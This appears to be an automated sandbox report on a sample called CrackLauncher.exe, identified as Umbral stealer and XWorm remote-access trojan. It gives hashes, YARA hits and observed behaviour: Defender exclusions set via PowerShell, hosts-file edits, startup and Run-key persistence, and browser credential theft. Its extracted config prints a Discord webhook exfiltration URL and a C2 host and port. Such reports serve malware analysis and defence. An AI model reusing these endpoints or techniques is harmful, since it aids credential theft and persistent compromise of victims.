umbral | 87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95

Analysis

max time kernel
134s
max time network
148s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
29-06-2024 14:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CrackLauncher.exe
Size

3.0MB
MD5

6850a8c541b310a2f4a5cd88352856a3
SHA1

372ff19e90cec46e37797b343fe6f537116b4aae
SHA256

87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95
SHA512

924d20cd368e797a771cf8b27b5e8994c62139a85a92ca068b64b0ac65598475b2225a81d08abb2aab9ad87f08d261f950219c16cee1b6d2e21c4b0c95eee4fa
SSDEEP

49152:g97jAtnr1ky+cFvVnJxuw9APD764uBxsPqlRJiM4C/d7Nch8zmOqYmlMH9TLi:g9otJOc/Jxuw9g764ssPqlbiM46ch8z6

Score

10^/10

umbral xworm evasion execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1252172365647974441/4gQlLrJt2VtCn71LmsFuTifq4qn3SRnlOC0k8H5iaa8g2BlP4YuRr9feLLYTpIHpdtxd

Extracted

Family

xworm

Version

5.0

127.0.0.1:28223

unknown-sunglasses.gl.at.ply.gg:28223

Mutex

rVUJpGK3xHCE778M

Attributes

Install_directory
%AppData%
install_file
svchost.exe

aes.plain

Signatures

Detect Umbral payload 11 IoCs

resource	yara_rule
behavioral1/files/0x000d000000012279-27.dat	family_umbral
behavioral1/memory/2784-29-0x0000000000E00000-0x0000000000E40000-memory.dmp	family_umbral
behavioral1/memory/1760-182-0x0000000001170000-0x00000000011B0000-memory.dmp	family_umbral
behavioral1/memory/1704-305-0x0000000001240000-0x0000000001280000-memory.dmp	family_umbral
behavioral1/memory/1312-435-0x00000000013D0000-0x0000000001410000-memory.dmp	family_umbral
behavioral1/memory/2024-670-0x0000000000A10000-0x0000000000A50000-memory.dmp	family_umbral
behavioral1/memory/2744-768-0x0000000000E80000-0x0000000000EC0000-memory.dmp	family_umbral
behavioral1/memory/1124-1152-0x00000000012D0000-0x0000000001310000-memory.dmp	family_umbral
behavioral1/memory/2508-1252-0x00000000013C0000-0x0000000001400000-memory.dmp	family_umbral
behavioral1/memory/876-1449-0x00000000003B0000-0x00000000003F0000-memory.dmp	family_umbral
behavioral1/memory/2084-1556-0x0000000001230000-0x0000000001270000-memory.dmp	family_umbral

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral1/memory/2816-56-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/2816-54-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/2816-53-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/2816-50-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm
behavioral1/memory/2816-48-0x0000000000400000-0x0000000000412000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1756	powershell.exe
1996	powershell.exe
2032	powershell.exe
2452	powershell.exe
2764	powershell.exe
2504	powershell.exe
2740	powershell.exe
1656	powershell.exe
2364	powershell.exe
2660	powershell.exe
2812	powershell.exe
2928	powershell.exe
2720	powershell.exe
676	powershell.exe
1756	powershell.exe
1216	powershell.exe
2964	powershell.exe
2440	powershell.exe
544	powershell.exe
2664	powershell.exe
2476	powershell.exe
2196	powershell.exe
2964	powershell.exe
1076	powershell.exe
2512	powershell.exe
2212	powershell.exe
620	powershell.exe
2584	powershell.exe
2308	powershell.exe
1992	powershell.exe
380	powershell.exe
2544	powershell.exe
1632	powershell.exe
1244	powershell.exe
2780	powershell.exe
2732	powershell.exe
620	powershell.exe
2228	powershell.exe
2728	powershell.exe
2780	powershell.exe
2696	powershell.exe
2788	powershell.exe
1128	powershell.exe
2440	powershell.exe
2700	powershell.exe
2888	powershell.exe
1528	powershell.exe
676	powershell.exe
2564	powershell.exe
1912	powershell.exe
1632	powershell.exe
2592	powershell.exe
676	powershell.exe
1612	powershell.exe
1604	powershell.exe
1564	powershell.exe
1128	powershell.exe
1524	powershell.exe
1072	powershell.exe
748	powershell.exe
532	powershell.exe
2420	powershell.exe
2416	powershell.exe
824	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Запустить Nursultan.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 41 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x0038000000016126-39.dat	net_reactor
behavioral1/memory/1252-41-0x0000000001020000-0x0000000001208000-memory.dmp	net_reactor
behavioral1/memory/1992-100-0x0000000000190000-0x0000000000378000-memory.dmp	net_reactor
behavioral1/memory/2732-197-0x0000000000F80000-0x0000000001168000-memory.dmp	net_reactor
behavioral1/memory/2688-257-0x0000000000D90000-0x0000000000F78000-memory.dmp	net_reactor
behavioral1/memory/2704-314-0x0000000001260000-0x0000000001448000-memory.dmp	net_reactor
behavioral1/memory/2804-386-0x00000000008F0000-0x0000000000AD8000-memory.dmp	net_reactor
behavioral1/memory/2256-445-0x0000000000F90000-0x0000000001178000-memory.dmp	net_reactor
behavioral1/memory/444-496-0x0000000000C00000-0x0000000000DE8000-memory.dmp	net_reactor
behavioral1/memory/3020-540-0x0000000001220000-0x0000000001408000-memory.dmp	net_reactor
behavioral1/memory/332-578-0x0000000000360000-0x0000000000548000-memory.dmp	net_reactor
behavioral1/memory/2152-639-0x00000000009A0000-0x0000000000B88000-memory.dmp	net_reactor
behavioral1/memory/3036-679-0x00000000002F0000-0x00000000004D8000-memory.dmp	net_reactor
behavioral1/memory/2880-719-0x0000000000950000-0x0000000000B38000-memory.dmp	net_reactor
behavioral1/memory/1748-777-0x0000000000170000-0x0000000000358000-memory.dmp	net_reactor
behavioral1/memory/2912-831-0x00000000013B0000-0x0000000001598000-memory.dmp	net_reactor
behavioral1/memory/2712-871-0x00000000002A0000-0x0000000000488000-memory.dmp	net_reactor
behavioral1/memory/1600-921-0x0000000000D40000-0x0000000000F28000-memory.dmp	net_reactor
behavioral1/memory/1672-968-0x0000000000A80000-0x0000000000C68000-memory.dmp	net_reactor
behavioral1/memory/2240-1025-0x0000000000040000-0x0000000000228000-memory.dmp	net_reactor
behavioral1/memory/1080-1069-0x0000000000ED0000-0x00000000010B8000-memory.dmp	net_reactor
behavioral1/memory/1928-1115-0x0000000000B60000-0x0000000000D48000-memory.dmp	net_reactor
behavioral1/memory/2008-1161-0x0000000000FC0000-0x00000000011A8000-memory.dmp	net_reactor
behavioral1/memory/2688-1211-0x0000000000280000-0x0000000000468000-memory.dmp	net_reactor
behavioral1/memory/2844-1262-0x00000000001C0000-0x00000000003A8000-memory.dmp	net_reactor
behavioral1/memory/1036-1308-0x0000000001200000-0x00000000013E8000-memory.dmp	net_reactor
behavioral1/memory/920-1362-0x0000000000C20000-0x0000000000E08000-memory.dmp	net_reactor
behavioral1/memory/2892-1408-0x0000000000340000-0x0000000000528000-memory.dmp	net_reactor
behavioral1/memory/1328-1458-0x00000000009E0000-0x0000000000BC8000-memory.dmp	net_reactor
behavioral1/memory/2956-1513-0x0000000000080000-0x0000000000268000-memory.dmp	net_reactor
behavioral1/memory/1472-1614-0x0000000000030000-0x0000000000218000-memory.dmp	net_reactor
behavioral1/memory/1572-1658-0x0000000000350000-0x0000000000538000-memory.dmp	net_reactor
behavioral1/memory/2208-1698-0x00000000010C0000-0x00000000012A8000-memory.dmp	net_reactor
behavioral1/memory/824-1756-0x0000000000BC0000-0x0000000000DA8000-memory.dmp	net_reactor
behavioral1/memory/764-1810-0x00000000010A0000-0x0000000001288000-memory.dmp	net_reactor
behavioral1/memory/1772-1854-0x0000000000AB0000-0x0000000000C98000-memory.dmp	net_reactor
behavioral1/memory/2492-1892-0x0000000000E00000-0x0000000000FE8000-memory.dmp	net_reactor
behavioral1/memory/912-1948-0x00000000010D0000-0x00000000012B8000-memory.dmp	net_reactor
behavioral1/memory/692-1995-0x0000000001170000-0x0000000001358000-memory.dmp	net_reactor
behavioral1/memory/2724-2055-0x0000000001120000-0x0000000001308000-memory.dmp	net_reactor
behavioral1/memory/2964-2094-0x0000000000E40000-0x0000000001028000-memory.dmp	net_reactor

Drops startup file 38 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	MSBuild.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	MSBuild.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	Nursultan.exe

Executes dropped EXE 64 IoCs

pid	Process
2712	Nursultan Setup.exe
2784	Запустить Nursultan.exe
1252	Nursultan.exe
844	Nursultan Setup.exe
1640	Запустить Nursultan.exe
1992	Nursultan.exe
1188	Nursultan Setup.exe
1760	Запустить Nursultan.exe
2732	Nursultan.exe
2500	Nursultan Setup.exe
2672	Запустить Nursultan.exe
2688	Nursultan.exe
2264	Nursultan Setup.exe
1704	Запустить Nursultan.exe
2704	Nursultan.exe
476	Process not Found
1728	jqvljmboayxs.exe
2508	Nursultan Setup.exe
1964	Запустить Nursultan.exe
2804	Nursultan.exe
2496	Nursultan Setup.exe
2560	svchost.exe
1312	Запустить Nursultan.exe
2256	Nursultan.exe
1640	Nursultan Setup.exe
1508	Запустить Nursultan.exe
444	Nursultan.exe
824	Nursultan Setup.exe
2932	Запустить Nursultan.exe
3020	Nursultan.exe
1072	Nursultan Setup.exe
1216	Запустить Nursultan.exe
332	Nursultan.exe
2404	Nursultan Setup.exe
1912	Запустить Nursultan.exe
1512	jqvljmboayxs.exe
2152	Nursultan.exe
2456	Nursultan Setup.exe
2024	Запустить Nursultan.exe
3036	Nursultan.exe
1496	Nursultan Setup.exe
2916	Запустить Nursultan.exe
2880	Nursultan.exe
2292	Nursultan Setup.exe
2744	Запустить Nursultan.exe
1748	Nursultan.exe
2128	Nursultan Setup.exe
876	Запустить Nursultan.exe
2912	Nursultan.exe
2604	Nursultan Setup.exe
2748	Запустить Nursultan.exe
2712	Nursultan.exe
2244	Nursultan Setup.exe
2416	Запустить Nursultan.exe
1600	Nursultan.exe
2920	Nursultan Setup.exe
2400	Запустить Nursultan.exe
1604	jqvljmboayxs.exe
1672	Nursultan.exe
332	Nursultan Setup.exe
656	Запустить Nursultan.exe
2240	Nursultan.exe
1684	Nursultan Setup.exe
1804	Запустить Nursultan.exe

Loads dropped DLL 64 IoCs

pid	Process
1960	CrackLauncher.exe
1960	CrackLauncher.exe
2556	CrackLauncher.exe
2556	CrackLauncher.exe
940	CrackLauncher.exe
940	CrackLauncher.exe
2816	MSBuild.exe
2220	CrackLauncher.exe
2220	CrackLauncher.exe
1904	CrackLauncher.exe
1904	CrackLauncher.exe
476	Process not Found
2388	CrackLauncher.exe
2388	CrackLauncher.exe
2988	CrackLauncher.exe
2988	CrackLauncher.exe
2396	CrackLauncher.exe
2396	CrackLauncher.exe
2564	CrackLauncher.exe
2564	CrackLauncher.exe
2160	CrackLauncher.exe
2160	CrackLauncher.exe
1544	CrackLauncher.exe
1544	CrackLauncher.exe
476	Process not Found
476	Process not Found
536	CrackLauncher.exe
536	CrackLauncher.exe
3028	CrackLauncher.exe
3028	CrackLauncher.exe
1600	CrackLauncher.exe
1600	CrackLauncher.exe
1720	CrackLauncher.exe
1720	CrackLauncher.exe
2228	CrackLauncher.exe
2228	CrackLauncher.exe
2848	CrackLauncher.exe
2848	CrackLauncher.exe
2728	CrackLauncher.exe
2728	CrackLauncher.exe
476	Process not Found
476	Process not Found
976	CrackLauncher.exe
976	CrackLauncher.exe
320	CrackLauncher.exe
320	CrackLauncher.exe
2920	CrackLauncher.exe
2920	CrackLauncher.exe
1956	CrackLauncher.exe
1956	CrackLauncher.exe
1184	CrackLauncher.exe
1184	CrackLauncher.exe
576	CrackLauncher.exe
576	CrackLauncher.exe
476	Process not Found
476	Process not Found
2240	CrackLauncher.exe
2240	CrackLauncher.exe
940	CrackLauncher.exe
940	CrackLauncher.exe
2592	CrackLauncher.exe
2592	CrackLauncher.exe
2496	CrackLauncher.exe
2496	CrackLauncher.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe"	CrackLauncher.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe"	CrackLauncher.exe
